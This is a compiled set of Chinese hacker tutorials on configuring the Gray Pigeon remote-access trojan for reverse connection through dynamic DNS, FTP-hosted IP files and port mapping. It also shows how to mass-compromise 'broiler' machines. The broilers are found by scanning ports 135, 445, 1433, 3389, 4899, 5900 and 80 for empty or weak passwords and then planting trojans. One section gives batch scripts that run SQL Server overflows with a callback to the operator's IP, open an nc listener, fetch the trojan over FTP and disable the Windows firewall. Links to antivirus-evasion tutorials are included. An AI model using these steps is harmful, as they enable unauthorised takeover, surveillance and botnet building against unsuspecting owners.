灰鸽子抓肉鸡上线原理,动态域名与FTP的区别
常见黑客术语名称和常见漏洞名称
常见黑客术语名称和常见漏洞名称远控很流行的一类工具,其中最著名的是灰鸽子,远控最主要的功能就是控制电脑,一般用来做企业电脑批量管理,学校机房,网吧等,但是被黑客利用后,出现了很多新功能,比如键盘记录,偷看视频等,从某种意义上来说是严重违法的行为,随着杀毒软件的升级,和对此类软件的打击,现在玩远控的人越来越少了。
肉鸡所谓“肉鸡”是一种很形象的比方,用来比作那些能够随意被我们操控的电脑或服务器。
也就是被远控软件控制的机器。
木马就是那些表面上伪装成了正常的程序,可是当这些被程序运行时,就会获得电脑的整个操控权限。
有很多黑客就是用木马来对电脑进行破坏的,例如远控要控制电脑的前提就是先生成木马,然后想办法让对方运行,就能进行控制。
网页木马表面上伪装成一般的网页文件,但是把病毒代码直接插入到正常的网页文件中,当有人访问时,网页木马就会执行相应的漏洞代码进行破坏。
例如有人访问色情网站,发现cpu很高,实际上里面调用了挖矿的代码,当你访问网站时会利用你的电脑进行挖矿。
挂马就是在别人的网站文件里面放入网页木马,将恶意代码插入到对方正常的网页文件里,以使阅读者中马,挂马是形容一种操作行为,不是一种技术。
后门这是一种形象的比方,比如你想下载个腾讯qq,但是在网上下载到不是官方的文件,而是别人先把病毒文件绑定在正常的文件里,当打开时会中毒,通常这种病毒称为后门,因为受害者无法发现。
弱口令指那些密码强度不够,容易被猜解的密码,类似123456,abc123,abcdefg,woainixiaofeng这样的口令(密码),是黑客常见的入侵手段,100个密码就有20个左右是这种弱密码。
shell指的是一种指令执行环境,比方我们按下键盘上的“windows键+R”时出现“运行”对话框,在里面输入“cmd”会呈现一个可以运行命令的黑窗口,这个窗口大家基本上都用过,或者在黑客电影里看过,这个就是Windows的Shell执行环境。
灰鸽子原理及上线方法剖析
原创作者unis远程控制分类与远程协助区别远程控制技术是黑客必学的技术之一。
远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。
远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。
远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。
什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。
反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP的时候。
反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。
远程控制软件的功能与远控木马的特性我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。
如何使用灰鸽子软件
灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
灰鸽子内网各种方法
其实问题主要是网络的结构问题的理解上面了灰鸽子(服务端)要求你的条件是对方(控制端)的ip(你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的:外网的ip是怎么样的?要求不是192.168.x.x开头,10.10.x.x也不行,这两种ip是校园网等的内网常用的ip通常你们在网吧是不可能令到灰鸽子上线的,一般来说只有是家庭的adsl才有可能是公网的了。
(一般来说其它的可能都是不多的,例如:一些校园网内部的服务器,他们的ip是公网的,是不同的)你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的,虽然他们说的是可行的,但是他们不说实现的条件. 但是事实上你们没有这样的条件的!至于申请域名的事情是对于你自己的ip来说的。
(我一会儿具体补充)但是要明白对方(控制端)的ip也是内网的话,你是没有办法的。
比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50这个221.4.188.50是几十人到几百人在用的,是用到nat技术的网络(至于什么是nat,我不说了啦,你们去网上查查把)。
你永远也不可能直接连接到我的,(直接?)你要连接到我只有一种可能:(间接连接:中间通过一个外网的服务器,下面的讲解联系到灰鸽子自带的端口映射工具。
方法:生成映射服务端,放到他们学校的服务器。
不一定要控制他们学校的服务器。
上线地址填被你控制机器的IP。
)就是你控制了我们学校的一些服务器:ip是202.192.240.0这个网络的电脑是公网的.你就可以通过他连接到我而且还要我告诉你我的ip是什么才行啊.因为你永远也不知道我的内网ip是什么.除非你控制了我们的路由器.至于对方的ip是192.168.x.x这个也是一样的原理.你永远不会连接到它,除非....(我上面说了拉)至于自动上线的条件麻,就是多了一个:(其实自动上线的话,是令到你的肉鸡直接连接到你(你的ip)!!!什么?你的ip会变化的?这时候就用到域名了。
灰鸽子配置内网上线批量扫135抓鸡详解加图
灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。
现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径!注:本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射!介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备 (去掉忽略ICF防火墙前面的勾~)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具!==============================================================配置好服务端以后接下来测试一下鸽子是否能上线!只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡!!用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢~~扫完以后DOS界面会自动关系在文件目录下出现一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个的文件!(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了!(如图11)就先扫到这里其实还有好多呢!!关闭NTscan以后会在目录下自动建出一个的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成!不用说大家因该都会。
处理后的IP 连空格都需要去掉!(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开!(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确!把刚才找到的文件后缀改成lst为呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤!(如图14)下一步导出过滤好的IP另存为文件!操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续!我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了!(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本!(如图16)安装批量传马的工具安好后运行配置(如图17)打来—>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~==============此文章只供参考学习若使用给别人带来损失本人概不负责==============OK教程到此结束,请不要用于非法用途哦。
灰鸽子基础原理
2.本地电脑为动态IP,,则配置服务端可以用域名转向,也就是上面举的例子。
不能上线。
这里我得解释一个问题,内网环境下,电脑要和外界通信,必须得通过路由器,这就相当于路由器把它之下的电脑与外界隔离。
如果在电脑与路由器之间铺设一条路,通向外面,这样鸽子就能上线。具体来说,就是路由器开放8000端口与你的电脑直接相连,这样,鸽子
找到路由器,看到8000端口,就会由8000端口进来连接你的电脑,这样鸽子就找到我们的电脑,鸽子就上线了。
这样肉鸡2运行灰鸽子服务端后,会连接肉鸡1的8000端口,但此时肉鸡1并没有开放8000端口。这时我们在本地用端口映射工具控制端选择“映射”,这样肉鸡1就会开放8000端口,并把来自8000端口的连接转向我们本地电脑,也就是会把肉鸡2的连接转到我们本地电脑。这样鸽子就上线了。概括的说,就是,肉鸡2连接肉鸡1的8000端口,而肉鸡1会把来自8000端口的连接转到我们本地电脑。.
比如,先举个简单直观的例子。寝室有3台电脑,用交换机相连,这就意味着这3台电脑是不能接入互连网的。但彼此间可以通信。我们分别把3台电脑的IP 设置为192.168.0.1、192.168.0.2、192.168.0.3。假设我电脑的IP为其中一台,IP为第一个。如果我来配置服务端,打开灰鸽子,点击“配置服务程序”——“自动上线设置”处。我们添192.168.0.1,其他的选项不用管。直接点“生成服务器”这样就配置好了。你让另外2台电脑运行,或自己运行,都可以,都会上线,因为服务端很容易就找到了你的IP 192.168.0.1,并上线。这就好比,你养了只聪明的鸽子,你告诉它你的地址,这样每次它都会飞回来。
灰鸽子上线
灰鸽子上线方法内网外网网吧2007年04月22日星期日 17:28很多人新手在学习使用灰鸽子的过程中。
就因为不明白自动上线的原理。
才会提出各种希奇古怪的问题。
自动上线的实现原理为:本地木马程序通过访问固定网络。
来获得与宿主机的连接。
如果宿主机网络地址不为固定。
(俗称动态IP)那么则应该在配置木马的时候。
选择可以转向宿主机实际地址的域名或其他网络标记进行配置。
那么我们常用的。
黑防破解版的鸽子如何才能实现如下原理呢?要从配置说起。
我们看灰鸽子服务端最关键的配置处。
如图。
2我们再来看下说明。
如图3从原理中我们不难看出。
如果你的IP固定。
上线设置直接写你的固定IP即可。
应用环境:比如你在一个网吧里面希望控制同一网吧的电脑。
那么你的IP可以看成是固定的。
直接让木马连接你的IP就行了。
但是如果你换了台电脑。
该配置就不起作用了。
因为你的IP变化了。
木马也就无法访问到了。
但如果你把IP改回配置前的IP。
并强行注销掉原电脑地址。
同样可以实现自动上线。
不难看出。
这个应用环境范围很小。
如果不固定IP呢?则需要让想办法让鸽子来连接我们本地的一个固定标志。
总之,就是要让它知道我们的IP在何处。
并取得和我们的联系。
下面我们就来按照图3的说明来做详细操作。
第1。
DNS上线原理:木马程序通过对DNS的解析。
从而找到他应该上线的地址。
来实现向我们的控制端进行连接。
下次上线的时候。
只要把本地的IP更新到DNS上。
就完全实现自动上线了。
我们可以本地架设IIS服务。
下面以XP SP2 +花生壳动态域名为例子。
*(注本地网络为adsl动态IP)如图4。
这是配置的最关键一步图中DNS上线地址我写了我申请的免费花生壳动态域名。
只要我登陆花生壳对本地IP自动更新。
图5从而轻松让反弹木马上线。
从图中。
不难看出。
我申请了3个免费的域名。
也就是说。
木马可以通过连接任意一个域名来找到我。
当我换了IP后。
再登陆花生壳。
他就会自动我的IP更新到域名上了。
鸽子
固定ip上线线路:肉鸡--》路由器--》经映射至控制端。
动态域名上线线路:肉鸡--》希网动态域名--》解析获得路由器ip地址--》路由器--》经映射至控制端。
网页文件上线线路:肉鸡--》web空间中的ip.txt--》获得路由ip--》路由器--》经映射至控制端。
(2)upnp映射
如果你是通过路由器连接外网,拿不到路由器的管理权限。这个时候就得测试下路由器是否不支持upnp映射.
在灰鸽子中打开“工具”菜单下的内网端口映射。
通过vport服务端配置中设置好控制端口就可以生成服务器了。然后把这个服务器上传到一个拥有外网的肉鸡上(最好是服务器)运行。回到“内网端口映射”界面,填写好vport服务端的ip地址和控制端口,然后连接即可。此刻控制通道已经生成,控制线路:控制端--》vport服务端。在映射设置填写上线端口,其实就是配置灰鸽子服务端的上线端口,将远程的上线端口映射到本机的上线端口上来,这两个上线端口要尽量保持一致。
原理明白后,就需要寻求适当的方法了。首先需要找一个能够web访问的地方,简单的方法就是申请一个免费空间,不需要asp、php等脚本支持,现在网上的免费空间有很多,大家可以随便找一个,比如我的空间地址为“”,想把存放ip的文件保存在根目录下,那么这个web地址就是/ip.txt。我只需要改变这个ip.txt文件中的ip地址和端口就可以让肉鸡找到我。
动态域名解析原理
动态域名解析原理动态域名解析(Dynamic DNS)是指将动态分配的IP地址与域名进行关联的技术。
在传统的域名解析过程中,一般会将固定的IP地址与域名进行映射,使得用户能够通过域名访问到特定的服务器。
然而,由于网络环境的变化或者部署需求的变动,服务器的IP地址可能会发生改变,导致原有的域名无法正常访问。
为了解决这个问题,动态域名解析应运而生。
动态域名解析的原理可以简要分为以下几个步骤:1. 客户端更新IP地址:首先,客户端会定期检测自身的IP地址是否发生变化。
如果IP地址发生了改变,客户端会将新的IP地址上传至动态域名解析服务商的服务器。
2. 动态域名解析服务商更新记录:一旦接收到客户端上传的新IP地址,动态域名解析服务商会立即更新相应的解析记录。
这样,当用户通过域名访问时,服务商会将最新的IP地址返回给客户端。
3. DNS服务器缓存更新:当客户端发起域名解析请求时,DNS服务器会先查找自身的缓存记录。
如果缓存中存在解析记录且与动态域名解析服务商提供的记录相符,DNS服务器会直接返回该记录,从而提高解析效率。
如果缓存的记录不存在或者已过期,DNS服务器会跟随客户端的查询请求去动态域名解析服务商那里获取最新的解析记录。
通过以上步骤,动态域名解析实现了根据客户端的IP地址变化动态更新域名解析记录,确保用户可以通过域名始终访问到正确的服务器。
动态域名解析的应用场景包括但不限于以下几个方面:1. 远程访问:在进行远程访问时,由于网络环境的不稳定性,IP地址可能会发生改变。
通过使用动态域名解析,用户无需关心IP地址的变化,只需使用域名即可远程访问到目标服务器。
2. 服务器负载均衡:为了提高服务器的性能和稳定性,通常会使用负载均衡技术将用户的请求分发到多台服务器上。
动态域名解析可以实现在服务器发生扩容、变更或故障转移的情况下,无需修改域名记录即可确保用户的访问不受影响。
3. 移动设备访问:随着移动设备的普及,移动端用户对于实时性和稳定性的要求越来越高。
动态域名工作原理
动态域名工作原理
嘿呀!今天咱们就来好好聊聊“动态域名工作原理”!
首先呢,咱们得搞清楚啥是动态域名!哎呀呀,简单来说,它就是能让咱们在网络世界里更方便地找到那个不断变化位置的家伙!
那动态域名到底是咋工作的呢?哇哦!这可有趣啦!
当咱们的网络连接发生变化,比如说,IP 地址变了的时候,动态域名系统就开始发挥作用啦!它就像一个超级聪明的小侦探,时刻盯着这些变化呢!
它会通过一些特别的技术和协议,来捕捉到这些IP 地址的变动。
然后呢?然后它会迅速把新的IP 地址和咱们事先设定好的域名绑定在一起!
你想想看呀,要是没有动态域名,每次IP 地址一变,咱们不就得晕头转向,不知道该咋找到对应的服务或者设备啦?
比如说,你在家里搭建了一个私人服务器,但是你家的网络IP 经常变动。
这时候,动态域名就能帮上大忙啦!它能让你不管啥时候,都能通过那个固定的域名,轻松找到你的服务器,是不是很神奇呀?
动态域名的工作还依赖于一些服务器和软件的协同合作呢!这些服务器就像是一个个坚强的后盾,为整个系统的稳定运行提供保障。
还有哦,它的更新速度也很重要呢!要是更新不及时,那咱们不就又抓瞎啦?
总之呀,动态域名的工作原理虽然有点复杂,但是它真的给咱们的网络生活带来了太多的便利!哎呀呀,想想以前没有它的时候,得
多麻烦呀!
怎么样?现在你是不是对动态域名工作原理有了更清楚的了解啦?。
各端口抓肉鸡的几种方法
各端口抓肉鸡的几种方法.txt看一个人的的心术,要看他的眼神;看一个人的身价,要看他的对手;看一个人的底牌,要看他的朋友。
明天是世上增值最快的一块土地,因它充满了希望。
1、扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。
首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。
缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。
因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。
(详细动画可以去黑客网站搜索135)3、扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。
因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。
(详细动画可以去黑客网站搜索445)4、1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。
要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件@echo offfor /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save@echo offfor /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理@echo offNc -l -vv -p 556>daima.txtecho username>>daima.txtecho password>>daima.txtecho bin>>daima.txt(以2进制传输数据)echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txtecho bye>>daima.txtnet stop sharedaccess(关闭WINDOWS自带防火墙)ftp -s:daima.txtxxx.exe(也是填你木马的文件名)del daima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。
所有关于灰鸽子上线以及抓鸡的教程
电信/Soft/html/11/22/2006/200603104908.htm
网通/Soft/html/11/22/2006/200603104908.htm
12、 内网鸽子上线绝版(无须影射)
网通/Soft/html/11/22/2006/200602244719.htm
26、 灰鸽子配置加内网路由器无权限上线
电信/Soft/html/11/22/2006/200602244717.htm
网通/Soft/html/11/22/2006/200602244717.htm
27、 原创-灰鸽子免杀之转换思路过卡巴
电信/Soft/html/9/88/2006/200602204682.htm
网通/Soft/html/9/88/2006/200602204682.htm
28、 灰鸽子简单免杀
电信/Soft/html/11/22/2006/200603064864.htm
网通/Soft/html/11/22/2006/200603064864.htm
21、 黑防鸽子服务端自动免杀器
电信/Soft/html/15/38/2006/200603064852.htm
31、 鸽子必备_DNS域名
电信/Soft/html/11/22/2006/200602194654.htm
网通/Soft/html/11/22/2006/200602194654.htm
32、 鸽子过卡吧内存免杀
电信/Soft/html/12/24/2006/200603094894.htm
网通/Soft/html/12/24/2006/200603094894.htm
灰鸽子配置详细讲解
这段话很关键,很多新手别配置不成的原因就是在这
我网站 放IP文件的地方是在databases下, 所以我输入的IP文件地址就是/databases/ip.txt
我添一下
4.然后自动保存的那个框要打钩哦
接着就可以 更新IP到FTP空间 了
是添你的网站后台里放IP。TXT的地方 不懂的可以看下后面的 说明
存放IP文件说明:
这里是远程FTP路径加文件名。如果是保存在FTP根目录下就直接写文件名。
示例:/目录名/文件名
如果使用了目录名请保证FTP目录已经存在
其中
“ 这里是远程FTP路径加文件名。如果是保存在FTP根目录下就直接写文件名。
FTP更新IP文件成功的!
本人是新手 特寻一位师傅,QQ:348387596 ゞ忝嘡/~↘斌
结束!
1.FTP服务器
添你申请的那个域名 我就添 端口21 我们就不用改了
2.用户名 密码
要添你申请的域名的登入帐号和密码我的用户名是cangkuwang 密码~·#¥%……就不说了
呵呵
连接类型别换 一定是要PASV的
3.存放IP的文件
我建在C盘里
然后那个主目录就可以设置成C盘喽!!
2.服务端口
要添的是 21 而不是2121 我们改下就行!
3.用户名
一定不要匿名哦 ! 什么原因我也不清楚 呵呵!
你随便添一个 比如我添的就是123
密码也一样随便添一个 我添123
4.钩上下面两个框 自动保存目录和端口信息 and 程序启动时自动开启FTP服务
大家好!我是 ゞ忝嘡/~↘小斌。
今天为大家演示一下灰格子的配置过程!
花生壳动态域名解析原理
花生壳动态域名解析原理1.引言花生壳是一款非常流行的动态域名解析工具,通过花生壳,用户可以将动态I P地址映射到一个固定的域名上,从而方便地访问家庭或者办公室内的服务器。
本文将介绍花生壳的动态域名解析原理。
2.背景知识在互联网中,I P地址是用于识别设备的一串数字,而域名则是为了方便用户记忆而进行的映射。
静态域名解析是将一个固定的域名映射到一个固定的I P地址上,而动态域名解析则是将一个域名映射到一个动态的IP 地址上。
3.动态域名解析原理动态域名解析需要解决一个问题,即动态I P地址的变化如何及时更新到域名解析服务器上。
花生壳通过以下几个步骤来完成动态域名解析:3.1注册域名用户需要先去域名注册商那里注册一个域名,并将域名解析服务器的地址配置到域名服务商提供的控制面板上。
3.2启动花生壳客户端用户在本地设备上启动花生壳客户端,客户端会与花生壳服务器建立连接,并将本地设备的I P地址发送给服务器。
3.3I P地址同步花生壳服务器会记录用户设备的I P地址,并定期检测IP地址是否发生变化。
当I P地址变化时,服务器会及时通知花生壳客户端进行更新。
3.4D N S更新当花生壳客户端收到服务器的通知后,它会找到注册的域名对应的解析记录,并将新的IP地址更新到相应的解析记录上。
这样,域名解析服务器上存储的IP地址就会及时更新。
4.优点与应用场景花生壳动态域名解析具有以下优点和应用场景:-方便远程访问:通过花生壳动态域名解析,用户可以方便地远程访问自己家中或者办公室内的设备,如摄像头、电脑等。
-免费使用:花生壳提供免费的动态域名解析服务,用户只需注册域名即可免费使用。
-自动更新:花生壳客户端会自动检测I P地址的变化,并及时更新到域名解析服务器上,无需手动操作。
5.结论花生壳动态域名解析原理通过与花生壳服务器的连接和定期的I P地址检测,实现了将动态I P地址与固定域名的映射。
这一技术方便了用户的远程访问,并且提供了一个免费、自动更新的解决方案。
黑客技术相关术语大全
从基础学起:黑客技术相关术语大全俗话说,入乡随俗,既然入了黑客的门,就必须懂得黑客的行话,下面编者将介绍黑客专用术语。
1.肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。
2.木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。
有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。
3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
4.挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对常的网页文件里,以使浏览者中马。
5.后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。
这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。
通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor):rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。
通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。
然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。
动态域名原理
动态域名原理动态域名(Dynamic Domain Name)是指可以根据网络环境的变化而自动更新解析记录的域名。
动态域名系统是为了解决动态IP地址的主机能够使用域名进行访问而设计的。
动态域名原理是通过将域名和动态IP地址进行绑定,实现动态IP地址的主机可以通过域名进行访问的技术。
动态域名的原理主要包括动态IP地址的获取和域名解析记录的更新两个方面。
首先,动态IP地址的获取是指动态域名系统需要获取主机的动态IP地址,以便将其与域名进行绑定。
其次,域名解析记录的更新是指动态域名系统需要将主机的动态IP地址与域名进行关联,并在IP地址发生变化时及时更新解析记录,以确保主机可以通过域名进行访问。
动态域名的原理是基于域名解析系统的工作原理。
域名解析系统是将域名转换为IP地址的关键组成部分,它通过域名解析记录来实现域名与IP地址之间的映射关系。
动态域名系统利用域名解析系统的能力,实现了动态IP地址的主机可以通过域名进行访问的功能。
动态域名的原理还涉及到动态域名服务提供商和客户端设备之间的通信和协作。
动态域名服务提供商负责管理域名解析记录,并提供更新解析记录的接口。
客户端设备需要定期向动态域名服务提供商发送自己的动态IP地址,并在IP地址发生变化时及时更新解析记录。
动态域名的原理在实际应用中有着广泛的应用。
例如,家庭用户可以通过动态域名实现家庭网络的远程访问,企业用户可以通过动态域名实现远程办公和远程监控,云服务提供商可以通过动态域名实现云主机的动态访问等。
总的来说,动态域名的原理是通过将动态IP地址与域名进行绑定,并及时更新解析记录,实现动态IP地址的主机可以通过域名进行访问的技术。
它基于域名解析系统的工作原理,涉及到动态域名服务提供商和客户端设备之间的通信和协作,具有广泛的应用前景。
各种抓鸡方法详细解说
各种抓鸡方法详细解说1.一般XP都很难扫不出IP,先要突破一下,可以用工具是“使xp 支持syn扫描”,运行就重启。
线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"net stop sharedaccess",一般都可以扫出IP,如果还不行,换个IP段。
2.扫描环境一般都是XP系统,但其实扫描IP速度很慢,而且扫不多!我建议抓鸡最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统!3.抓鸡方法135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!因为这个漏洞很久,所以端口也很少的了!如果整理IP不好,就很难扫出弱口令。
1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了!3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP 添加进入,见到XP,用户new密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马!4899端口,先扫描4899IP,然后整理!然后用4899探测器,A 导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行!5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!80端口,先扫描80IP,然后整理,再用Apache Tomcat 导入IP,端口8080改为80,等IP全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS 运行。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
